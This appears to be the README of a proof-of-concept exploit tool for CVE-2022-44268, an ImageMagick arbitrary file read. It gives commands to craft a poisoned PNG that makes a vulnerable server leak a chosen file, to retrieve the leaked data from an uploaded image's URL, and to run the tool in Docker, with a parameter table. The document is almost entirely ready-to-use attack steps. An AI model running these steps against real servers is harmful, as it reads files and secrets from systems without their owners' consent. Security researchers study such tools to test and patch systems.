CVE-2022-44268 ImageMagick 任意文件读取 - 概念验证漏洞利用代码
毒化图像 ☣️
python3 CVE-2022-44268.py --image imagetopoison.png --file-to-read /etc/hosts --output poisoned.png
Upload poisoned PNG image.
检查漏洞利用是否成功 🗡
python3 CVE-2022-44268.py --url http://vulnerable-imagemagick.com/uploads/vulnerable.png
构建
docker build -t cve-2022-44268 .
运行
docker run -v $(pwd)/data:/data -ti cve-2022-44268 --image /data/random.png --file-to-read "/etc/hosts" --output /data/poisoned.png
| 参数 | 描述 |
|---|
| 类型 |
|---|
| --url | 已上传 PNG 图片的 URL | 字符串 |
| --image | 输入 PNG 文件 | 文件 |
| --output | 输出 PNG 文件 | 文件 |
| --file-to-read | 要从易受攻击主机读取的文件 | 字符串 |